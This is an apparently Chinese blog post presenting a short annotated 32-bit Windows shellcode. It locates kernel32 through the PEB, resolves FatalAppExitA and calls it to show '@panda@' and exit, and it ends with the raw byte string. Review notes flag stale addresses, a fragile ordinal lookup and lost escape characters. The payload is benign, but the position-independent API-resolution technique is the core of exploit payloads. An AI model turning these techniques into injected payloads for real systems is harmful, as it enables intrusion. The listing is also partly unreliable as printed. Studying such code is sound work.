  • shellcode搜集

    好像 Windows 版本都行的：利用 FatalAppExit 函数弹出对话框，然后结束；shellcode 串很短。

    ; Debugger dump (OllyDbg layout: address | opcode bytes | mnemonic) of a
    ; 32-bit Windows position-independent stub.  It walks the PEB loader list
    ; to find kernel32, scans its export name table for the first name whose
    ; bytes 0-3 are "Fata" and 8-11 are "Exit" (FatalAppExitA per the original
    ; comment), resolves its address and calls it with (0, "@panda@").
    ; Register roles: edx = list walk, then export directory VA; eax = module
    ; base; esi = name pointer; edi = table pointer, finally the function VA;
    ; ebp = name index (+1 after the inc), then the ordinal.
    ; NOTE(review): the byte string that accompanies this dump begins with
    ; 31 D2 (xor edx,edx at 00406030); that instruction is not shown here but
    ; is what makes `mov dl,0x30` yield edx == 0x30.
    ; NOTE(review): from `mov ecx,esp` on, the printed addresses are 5 bytes
    ; ahead of what the listed opcode sizes give (89E1 should sit at 00406091),
    ; and the 108-byte string has nothing in that gap - the addresses look stale.
    00406032    B2 30           mov dl,0x30                                ; edx = 0x30 (upper bytes assumed 0, see note)
    00406034    64:8B12         mov edx,dword ptr fs:[edx]                 ; fs:[0x30] = TEB.ProcessEnvironmentBlock -> PEB
    00406037    8B52 0C         mov edx,dword ptr ds:[edx+0xC]             ; PEB.Ldr -> _PEB_LDR_DATA
    0040603A    8B52 1C         mov edx,dword ptr ds:[edx+0x1C]            ; InInitializationOrderModuleList.Flink (first entry)
    0040603D    8B42 08         mov eax,dword ptr ds:[edx+0x8]             ; eax = module base; +8 from the init-order links is LDR_DATA_TABLE_ENTRY.DllBase (original comment said InMemoryOrderLinks, but eax is used as the image base below)
    00406040    8B72 20         mov esi,dword ptr ds:[edx+0x20]            ; esi = UTF-16 module name buffer; original said FullDllName, but the '3'-at-0xC test below only fits the base name ("kernel32.dll")
    00406043    8B12            mov edx,dword ptr ds:[edx]                 ; Flink -> next InInitializationOrder entry (second)
    00406045    807E 0C 33      cmp byte ptr ds:[esi+0xC],0x33             ; 7th UTF-16 char == '3'?  True for "kernel32.dll" / "KERNEL32.DLL" in either case
    00406049  ^ 75 F2           jnz XlastTest.0040603D                     ; keep walking the list until kernel32 is found
    0040604B    89C7            mov edi,eax                                ; edi = base (IMAGE_DOS_HEADER)
    0040604D    0378 3C         add edi,dword ptr ds:[eax+0x3C]            ; edi += e_lfanew -> IMAGE_NT_HEADERS ("pe")
    00406050    8B57 78         mov edx,dword ptr ds:[edi+0x78]            ; DataDirectory[EXPORT].VirtualAddress (export table RVA)
    00406053    01C2            add edx,eax                                ; edx = IMAGE_EXPORT_DIRECTORY VA
    00406055    8B7A 20         mov edi,dword ptr ds:[edx+0x20]            ; AddressOfNames RVA (ENT)
    00406058    01C7            add edi,eax                                ; edi = ENT VA
    0040605A    31ED            xor ebp,ebp                                ; ebp = name index i = 0
    0040605C    8B34AF          mov esi,dword ptr ds:[edi+ebp*4]           ; esi = ENT[i] (name RVA)
    0040605F    01C6            add esi,eax                                ; esi = name VA
    00406061    45              inc ebp                                    ; ebp = i + 1 from here on
    00406062    813E 46617461   cmp dword ptr ds:[esi],0x61746146          ; name bytes 0-3 == "Fata" (little-endian 46 61 74 61)?
    00406068  ^ 75 F2           jnz XlastTest.0040605C                     ; no match -> next name
    0040606A    817E 08 4578697>cmp dword ptr ds:[esi+0x8],0x74697845      ; name bytes 8-11 == "Exit"?  (bytes 4-7 are never checked)
    00406071  ^ 75 E9           jnz XlastTest.0040605C                     ; no match -> next name.  FatalAppExit shows a message box and terminates the application once the box is closed
    00406073    8B7A 24         mov edi,dword ptr ds:[edx+0x24]            ; AddressOfNameOrdinals RVA (ordinal array)
    00406076    01C7            add edi,eax                                ; edi = ordinal array VA
    00406078    66:8B2C6F       mov bp,word ptr ds:[edi+ebp*2]             ; get the ordinal - but ebp is i+1, so this loads ordinal[i+1]; the upper half of ebp is still 0 from the xor, so bp is a full index.  NOTE(review): with the -4 below this only resolves the matched name while ordinal[i+1] == ordinal[i]+1, i.e. while kernel32's name ordinals stay sequential
    0040607C    8B7A 1C         mov edi,dword ptr ds:[edx+0x1C]            ; AddressOfFunctions RVA (EAT)
    0040607F    01C7            add edi,eax                                ; edi = EAT VA
    00406081    8B7CAF FC       mov edi,dword ptr ds:[edi+ebp*4-0x4]       ; edi = EAT[bp - 1] (function RVA)
    00406085    01C7            add edi,eax                                ; edi = VA of FatalAppExitA
    00406087    68 64614001     push 0x1406164                             ; bytes 64 61 40 01 = "da@\x01"
    0040608C    68 4070616E     push 0x6E617040                            ; bytes 40 70 61 6E = "@pan"; stack now reads "@panda@\x01"
    00406096    89E1            mov ecx,esp                                ; ecx -> that stack string
    00406098    FE49 07         dec byte ptr ds:[ecx+0x7]                  ; 0x01 -> 0x00: becomes the string's NUL terminator
    0040609B    31C0            xor eax,eax                                ; eax = 0 (uAction)
    0040609D    51              push ecx                                   ; arg 2: lpMessageText = "@panda@"
    0040609E    50              push eax                                   ; arg 1: uAction = 0
    0040609F    FFD7            call edi                                   ; FatalAppExitA(0, "@panda@"); the process is terminated, so nothing after this is reached

    // The same 108 bytes as the dump above, written as C string fragments.
    // The backslash of every \x escape was lost when this page was extracted
    // ("x31xD2" reads as "\x31\xD2").  The leading 31 D2 (xor edx,edx) is the
    // one instruction the dump above omits.
    "x31xD2xB2x30x64x8Bx12x8Bx52x0Cx8Bx52x1Cx8Bx42x08x8Bx72x20x8B"
    "x12x80x7Ex0Cx33x75xF2x89xC7x03x78x3Cx8Bx57x78x01xC2x8Bx7Ax20"
    "x01xC7x31xEDx8Bx34xAFx01xC6x45x81x3Ex46x61x74x61x75xF2x81x7E"
    "x08x45x78x69x74x75xE9x8Bx7Ax24x01xC7x66x8Bx2Cx6Fx8Bx7Ax1Cx01"
    "xC7x8Bx7CxAFxFCx01xC7x68x64x61x40x01x68x40x70x61x6Ex89xE1xFE"
    "x49x07x31xC0x51x50xFFxD7"
    //108 bytes  Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3
    // NOTE(review): the OS list is the author's claim; what the bytes actually
    // depend on is the x86 PEB/LDR/export-directory layout used above and a
    // base DLL name whose 7th character is '3'.  The string contains no 0x00 byte.














  • 原文地址:https://www.cnblogs.com/zcc1414/p/3982379.html